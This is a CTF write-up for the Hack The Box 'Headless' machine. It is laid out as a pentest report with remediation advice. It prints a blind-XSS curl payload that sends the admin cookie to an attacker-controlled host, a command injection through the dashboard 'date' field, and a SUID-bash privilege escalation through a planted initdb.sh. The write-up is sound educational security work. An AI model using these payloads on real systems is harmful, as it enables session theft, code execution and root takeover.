HTB Headless CTF Writeup
Table of Contents
ToggleThis comprehensive document unveils a range of vulnerabilities from medium to extreme severity within the HTB Headless CTF environment.
Executive Summary
Overview
The pentest conducted on the Headless CTF platform has uncovered multiple critical security vulnerabilities. These vulnerabilities span from blind Cross-Site Scripting (XSS) to Command Injection and Vertical Privilege Escalation. Each identified issue presents a significant threat to the integrity and security of the platform, potentially allowing unauthorized access, data exfiltration, and escalation of privileges.
Key Findings
Blind XSS in Support Messages
- Severity: Elevated
- Vulnerability: Blind XSS vulnerability was identified in the support message section, allowing attackers to execute arbitrary JavaScript in the context of the admin's session.
- Recommendation: Implement input validation and sanitization mechanisms to prevent the execution of unauthorized scripts.
Command Injection via Dashboard
- Severity: High
- Vulnerability: An authenticated command injection vulnerability was found in the dashboard's "date" parameter, enabling remote code execution.
- Recommendation: Sanitize and validate all user inputs, especially those used in system command execution contexts.
Vertical Privilege Escalation through Script Execution
- Severity: Extreme
- Vulnerability: A flaw was discovered that allows executing commands as root by exploiting a script (
/usr/bin/syscheck
) run by userdvir
. - Recommendation: Restrict the execution context of scripts and validate the origin and integrity of executables to prevent unauthorized elevation of privileges.
Summary
The identified vulnerabilities represent a substantial risk to the Headless CTF platform. Immediate remediation is advised to mitigate potential attacks that could compromise system integrity, lead to unauthorized data access, or allow attackers to gain elevated privileges within the system. The recommendations provided aim to guide the remediation process, emphasizing the importance of thorough input validation, the principle of least privilege, and secure coding practices.
Initial Target - 10.10.11.8
Service Enumeration
IP Address | TCP Ports Open |
---|---|
10.10.11.8 | 22, 5000 |
BS01 - Blind XSS (Cross Site Scripting)
Explanation
The vulnerability identified pertains to a Blind Cross-Site Scripting (XSS) flaw located within the support messaging functionality, accessible at http://10.10.11.8:5000/support
. This section is intended to allow users to communicate with the platform's support team. However, it harbors a significant security oversight. While there is a rudimentary security mechanism in place aimed at detecting and blocking submissions containing suspicious characters, such as "<" or ">", this protection is not foolproof. Triggering this protective measure results in an informative alert that the user's browser characteristics, inclusive of all HTTP headers, have been forwarded to the administrative team for further analysis.
The security flaw arises when, subsequent to activating this protective measure, an attacker embeds malicious JavaScript code within the request headers. Upon the administrative personnel reviewing the logs generated under suspicion of malicious activity, the injected script executes within the context of their session. This execution pathway enables the potential exfiltration of sensitive session cookies belonging to the administrative user, thereby compromising the integrity and confidentiality of the session.
Severity
This vulnerability is assigned an Elevated severity rating due to its potential to compromise administrative sessions and facilitate unauthorized access or further attacks against the platform.
Recommendations
Implement comprehensive input validation and sanitization on all user-submitted data to ensure that potentially harmful characters or code snippets are neutralized before processing. Also, adopt and enforce a robust Content Security Policy that specifically prohibits the execution of unauthorized or unsafe scripts within the context of the webpage, thereby mitigating the impact of XSS vulnerabilities.
Steps to Reproduce
- Setup a Listener: Initiate a simple HTTP server on the attacker's machine using Python with the command:
python3 -m http.server 80
. - Send the Malicious Payload: Execute a crafted
curl
command designed to trigger the protective measure and inject the malicious script:curl -X POST --data 'fname=bsec&lname=bsec&[email protected]&phone=123456789&message=<>;' -H 'Referer: <script>new Image().src="http://YOUR-TUN0-IP/?c="+document.cookie;</script>' http://10.10.11.8:5000/support -vv
- Capture the Admin Session Cookie: Monitor the HTTP server's logs for incoming requests. The admin session cookie will be appended after the
?c=
query parameter, evidencing the successful exfiltration:Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.8 - - [25/Mar/2024 14:10:15] "GET /?c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 200 -
BS02 - Initial Access via Command Injection
Explanation
A critical Command Injection vulnerability was uncovered following the successful exploitation of the previously discussed Blind XSS flaw (BS01). Attackers leveraging this initial vulnerability can escalate their access to interact with the /dashboard
endpoint, which is typically reserved for administrative personnel. The exploit involves the manipulation of cookie data to masquerade as the admin, thereby gaining unauthorized access to administrative functions.
The vulnerability specifically manifests when making a POST request to the /dashboard
endpoint. It is observed that the application does not adequately sanitize user-supplied input in the "date" field, allowing for the injection of arbitrary commands. This oversight enables an attacker to append a command injection payload to the "date" parameter, which the server then executes without validation.
Severity
Given its potential to allow unauthorized command execution, access to sensitive information, and the ability to further compromise the system, this vulnerability is classified with a High severity rating.
Recommendations
Ensure that all user inputs, especially those that could be used in system commands, are rigorously validated and sanitized to prevent the injection of malicious payloads.
Steps to Reproduce
- Leverage the PoC: Utilize the Proof of Concept (PoC) developed by BehindSecurity to exploit the command injection flaw, gaining unauthorized access to the system.
Insight
The flaw resides within a Flask application route that inadequately validates user-controlled input before executing it as part of a system command. Specifically, the application checks for administrative privileges and then directly incorporates the user-supplied "date" variable into a system command, executed via os.popen
. This vulnerability is exemplified in the code snippet provided, showcasing the absence of proper input validation mechanisms.
@app.route('/dashboard', methods=['GET', 'POST'])
def admin():
if serializer.loads(request.cookies.get('is_admin')) == "user":
return abort(401)
script_output = ""
if request.method == 'POST':
date = request.form.get('date')
if date:
script_output = os.popen(f'bash report.sh {date}').read()
return render_template('dashboard.html', script_output=script_output)
For instance, appending an arbitrary command such as ;ifconfig
to the "date" input would result in the execution of the ifconfig
command, with the output being displayed on the dashboard. This command execution occurs because the application fails to segregate user input from the command line, thereby treating the entire input string as a single command line to execute.
BS03 - Vertical Privilege Escalation Post-Exploitation
Explanation
The vulnerability centers around the /usr/bin/syscheck
script, which is executable by the user dvir
with root-level permissions. The script has a critical flaw in its operation: it searches for and executes a file named initdb.sh
located in the current working directory, without verifying the file's origin or integrity.
An attacker with access to the dvir
user account could exploit this vulnerability by crafting a malicious initdb.sh
script in a directory where dvir
possesses write permissions. By inducing the execution of this script with root privileges, the attacker can execute arbitrary commands as the root user, effectively compromising the entire system.
Severity
The gravity of this vulnerability is assessed as Extreme due to its potential to provide an attacker with unrestricted root access to the system, thereby bypassing all security mechanisms and controls.
Recommendations
Modify the /usr/bin/syscheck
script to validate the path and integrity of initdb.sh
before execution, ensuring that only trusted scripts are executed. Nevertheless, restrict the execution privileges of scripts and commands to the lowest level necessary for their operation, minimizing the potential impact of exploitation. Also, update scripts to use absolute paths when executing other scripts or binaries to prevent directory traversal attacks and unauthorized file execution.
Steps to Reproduce
- Preparation: Navigate to a writable directory, for instance,
/home/dvir
. - Script Creation: Craft a malicious
initdb.sh
script within the directory. This script should contain commands intended to elevate privileges or execute arbitrary commands as root. For instance:#!/bin/bash chmod +s /bin/bash
- Permission Modification: Assign executable permissions to the malicious script to ensure its execution by the root user:
chmod 777 initdb.sh
- Execution Trigger: Utilize
sudo
or equivalent privileges to execute/usr/bin/syscheck
, prompting the script to search for and executeinitdb.sh
. - Gain Root Shell: Following the successful execution of the malicious script, an attacker can leverage the modified permissions to obtain a root shell, using the command
/bin/bash -p
.
Conclusion – HTB Headless CTF
We hope you have found our content on HTB Headless CTF useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.